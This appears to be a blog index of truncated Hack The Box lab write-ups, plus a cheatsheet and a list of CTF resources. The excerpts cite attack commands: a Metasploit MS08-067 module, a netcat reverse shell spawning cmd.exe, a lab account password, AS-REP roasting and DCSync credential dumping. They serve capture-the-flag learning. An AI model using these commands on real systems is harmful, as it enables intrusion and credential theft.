Hack the box(HTB) Legacy writeup 0 (0)

Hack the box(HTB) legacy writeup

Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module to exploit it. Enumeration Nmap Scan Increasing send delay for from 0 to 5 … Read more

Hack the box(HTB) Registry writeup 0 (0)

Hack the box registry writeup

Introduction Registry is a retired machine from the platform hack the box and writeups of retired machines are only allowed. Registry is a HARD machine of worth points 40. Steps Nmap scan Enumerating webpages Exploiting docker Getting docker blobs Getting id_rsa keys Getting user.txt Enumerating Login into bolt webpage and uploading reverse shell Backing up … Read more

Hack the box(HTB) Sniper write up 0 (0)

Hack the box(HTB) Sniper write up

Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV nano /etc/samba/smb.conf service smbd start nc.exe 4444 -e cmd.exe powershell $username = ‘SNIPER\Chris’ $password = ’36mEAhz/B8xQ~2VM’ $securePassword = ConvertTo-SecureString $password -AsPlainText … Read more

Hackthebox(HTB) Forest Detailed Writeup | walkthrough 0 (0)

Forest hack the box writeup

Steps: Nmap Scan. Enumerating user names. Exploiting Kerberos Decryption of hash.txt. Login with Evil-winrm(user) Uploading Blood hound Adding User to group. Escalating the privilages. DCSync attack via secretsdump Login with wmiexec.py(root) Tools used Impacket(GetNPUsers.py,ntlmrelayx.py ,secretsdump.py) Evil-winrm Bloodhound. Commands used nmap -sC -sV -oV enum4linux -a GetNPUsers.py HTB.local/ -usersfile /root/Desktop/htb/forest/user.txt -format john -outputfile hashes.txt … Read more

Cheatsheet for HTB 5 (2)

Linux General ctrl + r Search History reverse Run Script at startup update-rc.d -f /path/to/the/script remove Delete Script from defaults Vim i for insert mode esc to leave insert mode To be continued with macros and all this handy shit Tmux Config from ippsec. First press the prefix ctrl + a, then release the buttons … Read more

Getting Started with CTFs 0 (0)

CTF starting

CTF Competitions DEFCON CTF picoCTF Ghost in the Shellcode ROOTCON Campus Tour CTF ROOTCON CTF CSAW CTF HSCTF UCSB iCTF Smash the Stack Embedded Security CTF DefCamp CTF HITCON CTF CTF Guides and Resources Trail of Bits CTF Guide – one of the best guides for newbies Practice CTF List / Permanent CTF List – … Read more